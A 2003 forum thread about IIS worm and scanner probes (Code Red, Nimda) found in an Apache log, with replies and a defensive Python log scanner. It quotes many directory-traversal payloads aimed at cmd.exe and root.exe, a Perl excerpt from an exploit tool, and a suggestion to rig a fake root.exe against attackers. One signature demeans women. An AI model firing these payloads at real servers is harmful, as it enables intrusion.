-
November 18th, 2003, 03:32 PM
#1
Junior Member
Apache under attack from IIS server?
I'm running a little old computer with Apache, and I keep getting some very interesting logs in the Apache access.log file...
[ip] - - [18/11/03:12:36:11 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 294
[ip] - - [18/11/03:12:36:11 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
[ip] - - [18/11/03:12:36:11 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
[ip] - - [18/11/03:12:36:11 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
[ip] - - [18/11/03:12:36:12 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
[ip] - - [18/11/03:12:36:12 +0000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
[ip] - - [18/11/03:12:36:12 +0000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
[ip] - - [18/11/03:12:36:12 +0000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 333
[ip] - - [18/11/03:12:36:12 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 303
[ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
[ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
[ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
[ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
[ip] - - [18/11/03:12:36:13 +0000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
[ip] - - [18/11/03:12:36:14 +0000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
[ip] - - [18/11/03:12:36:14 +0000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
Thankfully all are 404 or 400'ed, but I'm worried that it's doing more than just that. I'm actually worried that it's in the system. I'm behind two firewalls [software and hardware], but I still feel insecure about it. I want to run Apache though, because I host a few documents off of it...
If anyone can tell me what's happening in those logs and what the attacking party could be, it would help, because this shows up a lot in my logs!
Thanks for your time in reading this;
NeoThermic
-
November 18th, 2003, 03:44 PM
#2
It's a worm.
Or several worms.
It's perfectly normal, and happens to all Apache servers on the web all the time. You can safely ignore it.
Slarty
-
November 18th, 2003, 03:47 PM
#3
Junior Member
Hmm... so what are they after? There is no root.exe on my computer...
NeoThermic
-
November 18th, 2003, 03:51 PM
#4
As Slarty says, it's probably a worm, so they are not after you specifically. The worm is searching for any vulnerable computer.
-
November 18th, 2003, 03:55 PM
#5
Originally posted here by NeoThermic
Hmm... so what are they after? There is no root.exe on my computer...
NeoThermic
They are after any machine that has the following conditions met:
a) port 80 open
b) running IIS
c) vulnerable version of IIS
Since you only meet one condition, then you're not going to be affected. It's likely one of the following types of worms/scanner (which a quick visit to Google will help you with info on them):
Code Red
Code Red II
nimda
Traversal Directory worm (new?)
Traversal Directory scanner
-
November 18th, 2003, 04:08 PM
#6
Unpatched IIS servers are vulnerable to a directory traversal using Unicode (..%c1%9c). These worms, the most common being the Code Red variety, don't bother to check if you're running IIS or not. They just run their scripts. You can expect to see this many more times. It's pitiful how many people don't patch their machines, but for you it really is nothing to worry about.
root.exe is nothing more than cmd.exe renamed and placed in a web directory that executables are allowed to run in, to make it easier to break into later on.
Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”
-
November 18th, 2003, 07:07 PM
#7
Senior Member
And again... this is no worm, just an IIS scanner looking for the Unicode hole or even cracked IIS.
(copy of cmd.exe -> root.exe to bypass the output restrictions)
Well, I think I've got a déjà vu?
-
November 19th, 2003, 01:35 AM
#8
Fun little game is to create a root.exe file in the requested directory. Now they will execute that file, I am sure. If you control what it does on execution you can have a lot of fun with it.
Who is more trustworthy than all of the gurus or Buddhas?
-
November 19th, 2003, 06:31 AM
#9
Stranger, I have to disagree. Code Red doesn't check for an IIS string while most automated tools do, and if you mean some sk just scanning a broad range of IPs without checking, I think the number of infected servers is far greater than kiddies doing that (although I could be wrong; I'm making this judgement based on people I know):
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
# Server string subroutine.
# Note: &connect, @results and &exit are defined elsewhere in the script
# this was excerpted from; they are not part of the excerpt.
sub server {
    my $X;
    print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";   # clear the screen
    print "\nTrying to obtain IIS Server string ...";
    $probe = "string";          # global, presumably read by &connect
    my $output;
    my $webserver = "something";
    &connect;
    # Look through the first lines of the response for an IIS banner.
    for ($X = 0; $X <= 10; $X++) {
        $output = $results[$X];
        if (defined $output) {
            if ($output =~ /IIS/) { $webserver = "iis" };
        };
    };
    if ($webserver ne "iis") {
        print "\a\a\n\nWARNING : UNABLE TO GET IIS SERVER STRING.";
        print "\nThis Server may not be running Micro\$oft IIS WebServer";
        print "\nand therefore may not be exploitable using the";
        print "\nUnicode Bug.";
        print "\n\n\nDo You Wish To Cont ... [Y/N]";
        my $choice = <STDIN>;
        chomp $choice;
        if ($choice =~ /N/i) { &exit };
    } else {
        print "\n\nOK ... It Seems To Be Micro\$oft IIS.";
    };
}   # closing brace of sub server (missing from the quoted excerpt)
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
although the GET requests are identical line for line
http://isp-lists.isp-planet.com/isp-.../msg00005.html
and from http://cis.tamu.edu/security/microsoft/Nimda.html
DETAILS OF IIS PROPAGATION:
A short example of the IIS probes launched by the worm is shown below. These logs were captured by an Apache web server. Note that the pattern repeats itself; some reports indicate that the 16-probe sequence will be repeated against a single target as many as 13 times. Note that the first two attacks show the worm attempting to exploit the root.exe backdoor left by Code Red II or possibly Sadmind infections. The next set of two attacks are also targeting Code Red II backdoors where the root C: and D: drives are mapped to IIS virtual folders, allowing access to cmd.exe.
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
"GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "-"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249 "-" "-"
etc, etc.
it's deja vu all over again...Yogi Berra
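Added example, not code from anyone in this thread: a small Python log scanner that applies the probe families described in posts #5 and #9 (Code Red II root.exe backdoor, C:/D: drive mappings, double-encoded and Unicode traversal of cmd.exe) to Apache access-log lines, and flags any probe the server did not reject with a 4xx. The sample lines are constructed from the entries quoted above, with placeholder IPs.

```python
import re
from collections import Counter

# Constructed sample, modelled on the lines quoted in this thread; the IPs are placeholders.
SAMPLE_LOG = """\
10.0.0.1 - - [18/11/03:12:36:11 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 294
10.0.0.1 - - [18/11/03:12:36:11 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
10.0.0.1 - - [18/11/03:12:36:11 +0000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
10.0.0.1 - - [18/11/03:12:36:12 +0000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
10.0.0.1 - - [18/11/03:12:36:12 +0000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 403 303
10.0.0.1 - - [18/11/03:12:36:13 +0000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
10.0.0.1 - - [18/11/03:12:36:13 +0000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
10.0.0.2 - - [18/11/03:12:40:00 +0000] "GET /index.html HTTP/1.1" 200 1024
"""

# Common Log Format: host ident user [time] "method path proto" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Probe families named in the thread, matched on the request path; first match wins.
SIGNATURES = [
    ("codered2-root-backdoor", re.compile(r"/root\.exe\?", re.I)),
    ("codered2-drive-mapping", re.compile(r"^/[cd]/winnt/system32/cmd\.exe", re.I)),
    ("double-encoded-traversal", re.compile(r"%25(5c|2f)|%%35%63|%%35c", re.I)),
    ("unicode-traversal", re.compile(r"%c0%(2f|af)|%c1%(1c|9c)", re.I)),
]

def classify(path):
    """Return the probe family for a request path, or None if it is not a known probe."""
    for label, pattern in SIGNATURES:
        if pattern.search(path):
            return label
    return None

def scan(log_text):
    """Count probes per family; also collect probes the server did NOT answer with a 4xx
    (404/403/400 is the expected refusal on a non-IIS host; 2xx/3xx deserve a closer look)."""
    counts, not_rejected = Counter(), []
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        ip, _ts, _method, path, status, _size = m.groups()
        label = classify(path)
        if label is None:
            continue
        counts[label] += 1
        if not status.startswith("4"):
            not_rejected.append((ip, path, int(status)))
    return counts, not_rejected
```

Run against the sample, the only probe not refused is the first root.exe request, which the Apache server answered with a 302 rather than a 404; that is the line worth checking in a real log (what redirect rule or handler answered it).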
-
November 21st, 2003, 11:39 AM
#10
Senior Member
@tedob you are right... I checked my Apache logs and on getting scanned there were a lot more tryouts.
aaah...there it is: http://www.antionline.com/showthread...hreadid=250942